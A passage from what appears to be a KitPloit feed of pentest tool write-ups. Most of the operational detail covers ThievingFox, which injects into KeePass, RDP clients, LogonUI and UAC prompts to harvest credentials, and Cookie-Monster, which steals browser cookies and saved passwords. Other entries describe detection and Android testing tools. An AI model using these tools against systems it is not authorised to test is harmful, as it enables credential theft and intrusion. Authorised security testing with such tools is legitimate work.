    ThievingFox works with python >= 3.11.

    Windows

    Rustup must be installed, follow the instructions available here : https://rustup.rs/

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-msvc
    rustup target add i686-pc-windows-msvc

    .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

    Finally, python dependancies must be installed :

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11

    NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)

    Targets

    All modules have been tested on the following Windows versions :

    Windows Version
    Windows Server 2022
    Windows Server 2019
    Windows Server 2016
    Windows Server 2012R2
    Windows 10
    Windows 11

    [!CAUTION] Modules have not been tested on other version, and are expected to not work.

    Application Injection Method
    KeePass.exe AppDomainManager Injection
    KeePassXC.exe DLL Proxying
    LogonUI.exe (Windows Login Screen) COM Hijacking
    consent.exe (Windows UAC Popup) COM Hijacking
    mstsc.exe (Windows default RDP client) COM Hijacking
    RDCMan.exe (Sysinternals' RDP client) COM Hijacking
    MobaXTerm.exe (3rd party RDP client) COM Hijacking

    Usage

    [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

    ThievingFox contains 3 main modules : poison, cleanup and collect.

    Poison

    For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

    To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

    --mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

    --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

    The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

    Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

    [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

    $ python3 client/ThievingFox.py poison -h
    usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
    [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
    [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to poison KeePass.exe
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepassxc Try to poison KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --ke epassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to poison mstsc.exe
    --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
    logged in (Default: False)
    --consent Try to poison Consent.exe
    --logonui Try to poison LogonUI.exe
    --rdcman Try to poison RDCMan.exe
    --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
    logged in (Default: False)
    --mobaxterm Try to poison MobaXTerm.exe
    --mobaxterm-poison-hkcr
    Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
    logged in (Default: False)
    --all Try to poison all applications

    Cleanup

    For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

    For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

    Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

    It does not clean extracted credentials on the remote host.

    [!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

    $ python3 client/ThievingFox.py cleanup -h
    usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
    [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
    [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
    --consent Try to cleanup all poisonning artifacts related to Consent.exe
    --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
    --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
    --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
    --all Try to cleanup all poisonning artifacts related to all applications

    Collect

    For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

    Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

    $ python3 client/ThievingFox.py collect -h
    usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
    [--logonui] [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of th e domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Collect KeePass.exe logs
    --keepassxc Collect KeePassXC.exe logs
    --mstsc Collect mstsc.exe logs
    --consent Collect Consent.exe logs
    --logonui Collect LogonUI.exe logs
    --rdcman Collect RDCMan.exe logs
    --mobaxterm Collect MobaXTerm.exe logs
    --all Collect logs from all applications


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    HackerInfo - Infromations Web Application Security

    By: Zion3R β€” April 24th 2024 at 12:30




    Infromations Web Application Security


    install :

    sudo apt install python3 python3-pip

    pip3 install termcolor

    pip3 install google

    pip3 install optioncomplete

    pip3 install bs4


    pip3 install prettytable

    git clone https://github.com/Matrix07ksa/HackerInfo/

    cd HackerInfo

    chmod +x HackerInfo

    ./HackerInfo -h



    python3 HackerInfo.py -d www.facebook.com -f pdf
    [+] <-- Running Domain_filter_File ....-->
    [+] <-- Searching [www.facebook.com] Files [pdf] ....-->
    https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
    https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
    https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
    https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
    h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
    https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
    https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf
    #####################[Finshid]########################

    Usage:

    Hackerinfo infromations Web Application Security (11)

    Library install hackinfo:

    sudo python setup.py install
    pip3 install hackinfo



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Cookie-Monster - BOF To Steal Browser Cookies & Credentials

    By: Zion3R β€” April 17th 2024 at 12:30


    Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.


    BOF Usage

    Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
    cookie-monster Example:
    cookie-monster --chrome
    cookie-monster --edge
    cookie-moster --firefox
    cookie-monster --chromeCookiePID 1337
    cookie-monster --chromeLoginDataPID 1337
    cookie-monster --edgeCookiePID 4444
    cookie-monster --edgeLoginDataPID 4444
    cookie-monster Options:
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file
    --chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
    --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

    EXE usage

    Cookie Monster Example:
    cookie-monster.exe --all
    Cookie Monster Options:
    -h, --help Show this help message and exit
    --all Run chrome, edge, and firefox methods
    --edge Extract edge keys and download Cookies/Login Data file to PWD
    --chrome Extract chrome keys and download Cookies/Login Data file to PWD
    --firefox Locate firefox key and Cookies, does not make a copy of either file

    Decryption Steps

    Install requirements

    pip3 install -r requirements.txt

    Base64 encode the webkit masterkey

    python3 base64-encode.py "\xec\xfc...."

    Decrypt Chrome/Edge Cookies File

    python .\decrypt.py "XHh..." --cookies ChromeCookie.db

    Results Example:
    -----------------------------------
    Host: .github.com
    Path: /
    Name: dotcom_user
    Cookie: KingOfTheNOPs
    Expires: Oct 28 2024 21:25:22

    Host: github.com
    Path: /
    Name: user_session
    Cookie: x123.....
    Expires: Nov 11 2023 21:25:22

    Decrypt Chome/Edge Passwords File

    python .\decrypt.py "XHh..." --passwords ChromePasswords.db

    Results Example:
    -----------------------------------
    URL: https://test.com/
    Username: tester
    Password: McTesty

    Decrypt Firefox Cookies and Stored Credentials:
    https://github.com/lclevy/firepwd

    Installation

    Ensure Mingw-w64 and make is installed on the linux prior to compiling.

    make

    to compile exe on windows

    gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

    TO-DO

    • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

    References

    This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
    Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
    Fileless download: https://github.com/fortra/nanodump
    Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

    By: Zion3R β€” April 8th 2024 at 12:30


    Permiso: https://permiso.io
    Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

    CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


    Notes

    To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

    Required Packages

    bash pip3 install -r requirements.txt

    Cloning cloudgrep locally

    To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

    bash chmod +x clone.sh ./clone.sh

    Input

    This tool offers a CLI (Command Line Interface). As such, here we review its use:

    Example 1 - Running the tool with default queries file

    Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

    Note

    Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

    {
    "AWS": [
    {
    "bucket": "cloudtrail-logs-00000000-ffffff",
    "prefix": [
    "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
    "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
    ]
    },
    {
    "bucket": "aws-kosova-us-east-1-00000000"
    }

    ],
    "AZURE": [
    {
    "accountname": "logs",
    "container": [
    "cloudgrappler"
    ]
    }
    ]
    }

    Run command

    python3 main.py

    Example 2 - Permiso Intel Use Case

    python3 main.py -p

    [+] Running GetFileDownloadUrls.*secrets_ for AWS 
    [+] Threat Actor: LUCR3
    [+] Severity: MEDIUM
    [+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.

    Example 3 - Generate report

    python3 main.py -p -jo

    reports
    └── json
    β”œβ”€β”€ AWS
    β”‚Β Β  └── 2024-03-04 01:01 AM
    β”‚Β Β  └── cloudtrail-logs-00000000-ffffff--
    β”‚Β Β  └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    β”‚Β Β  └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
    └── 2024-03-04 01:01 AM
    └── logs
    └── cloudgrappler
    └── okta_key.json

    Example 4 - Filtering logs based on date or time

    python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

    Example 5 - Manually adding queries and data source types

    python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

    Example 6 - Running the tool with your own queries file

    python3 main.py -f new_file.json

    Running in your Cloud and Authentication cloudgrep

    AWS

    Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

    If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

    Azure

    The simplest way to authenticate with Azure is to first run:

    az login

    This will open a browser window and prompt you to login to Azure.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

    By: Zion3R β€” April 5th 2024 at 11:30


    AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


    Star the Repo

    If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

    Features

    • Generates unique incident response scenarios based on chosen threat actor groups.
    • Allows you to specify your organisation's size and industry for a tailored scenario.
    • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
    • Create custom scenarios based on a selection of ATT&CK techniques.
    • Capture user feedback on the quality of the generated scenarios.
    • Downloadable scenarios in Markdown format.
    • πŸ†• Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
    • Available as a Docker container image for easy deployment.
    • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


    Releases

    v0.4 (current)

    What's new? Why is it useful?
    Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
    Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
    Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
    Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

    v0.3

    What's new? Why is it useful?
    Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

    - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
    LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

    - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
    Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
    Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

    v0.2

    What's new? Why is it useful?
    Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

    - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
    User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
    Improved error handling for missing API keys - Improved user experience.
    Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

    v0.1

    Initial release.

    Requirements

    • Recent version of Python.
    • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
    • OpenAI API key.
    • LangChain API key (optional) - see LangSmith Setup section below for further details.
    • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

    Installation

    Option 1: Cloning the Repository

    1. Clone this repository:
    git clone https://github.com/mrwadams/attackgen.git
    1. Change directory into the cloned repository:
    cd attackgen
    1. Install the required Python packages:
    pip install -r requirements.txt

    Option 2: Using Docker

    1. Pull the Docker container image from Docker Hub:
    docker pull mrwadams/attackgen

    LangSmith Setup

    If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

    If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

    Data Setup

    Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/ directory within the repository.

    Running AttackGen

    After the data setup, you can run AttackGen with the following command:

    streamlit run πŸ‘‹_Welcome.py

    You can also try the app on Streamlit Community Cloud.

    Usage

    Running AttackGen

    Option 1: Running the Streamlit App Locally

    1. Run the Streamlit app:
    streamlit run πŸ‘‹_Welcome.py
    1. Open your web browser and navigate to the URL provided by Streamlit.
    2. Use the app to generate standard or custom incident response scenarios (see below for details).

    Option 2: Using the Docker Container Image

    1. Run the Docker container:
    docker run -p 8501:8501 mrwadams/attackgen

    This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine. 2. Open your web browser and navigate to http://localhost:8501. 3. Use the app to generate standard or custom incident response scenarios (see below for details).

    Generating Scenarios

    Standard Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
    3. Select your organisatin's industry and size from the dropdown menus.
    4. Navigate to the Threat Group Scenarios page.
    5. Select the Threat Actor Group that you want to simulate.
    6. Click on 'Generate Scenario' to create the incident response scenario.
    7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Custom Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
    3. Select your organisation's industry and size from the dropdown menus.
    4. Navigate to the Custom Scenario page.
    5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
    6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
    7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

    Contributing

    I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

    Licence

    This project is licensed under GNU GPLv3.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices

    By: Zion3R β€” April 3rd 2024 at 11:30


    ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


    ~ Hilali Abdel

    USAGE

    python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

    [Add new Device]

    python3 smartthings.py -a 192.168.1.1

    python3 smarthings.py -s --type TPLINK

    python3 smartthings.py -s --firmware TP-Link Archer C7v2

    Search for CVE and Poc [ firmware and device type]

    Β 

    Scan device for open upnp ports

    python3 smartthings.py -s --scan upnp --id

    get data from mqtt 'subscribe'

    python3 smartthings.py -s --scan mqtt --id



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Drozer - The Leading Security Assessment Framework For Android

    By: Zion3R β€” April 1st 2024 at 11:30


    drozer (formerly Mercury) is the leading security testing framework for Android.

    drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

    drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

    drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.

    drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/


    Docker Container

    To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.

    • The Docker container and basic setup instructions can be found here.
    • Instructions on building your own Docker container can be found here.

    Manual Building and Installation

    Prerequisites

    1. Python2.7

    Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

    1. Protobuf 2.6 or greater

    2. Pyopenssl 16.2 or greater

    3. Twisted 10.2 or greater

    4. Java Development Kit 1.7

    Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

    1. Android Debug Bridge

    Building Python wheel

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    python setup.py bdist_wheel

    Installing Python wheel

    sudo pip install dist/drozer-2.x.x-py2-none-any.whl

    Building for Debian/Ubuntu/Mint

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    make deb

    Installing .deb (Debian/Ubuntu/Mint)

    sudo dpkg -i drozer-2.x.x.deb

    Building for Redhat/Fedora/CentOS

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    make rpm

    Installing .rpm (Redhat/Fedora/CentOS)

    sudo rpm -I drozer-2.x.x-1.noarch.rpm

    Building for Windows

    NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    python.exe setup.py bdist_msi

    Installing .msi (Windows)

    Run dist/drozer-2.x.x.win-x.msi 

    Usage

    Installing the Agent

    Drozer can be installed using Android Debug Bridge (adb).

    Download the latest Drozer Agent here.

    $ adb install drozer-agent-2.x.x.apk

    Starting a Session

    You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

    We will use the server embedded in the drozer Agent to do this.

    If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

    $ adb forward tcp:31415 tcp:31415

    Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

    Then, on your PC, connect using the drozer Console:

    On Linux:

    $ drozer console connect

    On Windows:

    > drozer.bat console connect

    If using a real device, the IP address of the device on the network must be specified:

    On Linux:

    $ drozer console connect --server 192.168.0.10

    On Windows:

    > drozer.bat console connect --server 192.168.0.10

    You should be presented with a drozer command prompt:

    selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
    dz>

    The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

    You are now ready to start exploring the device.

    Command Reference

    Command Description
    run Executes a drozer module
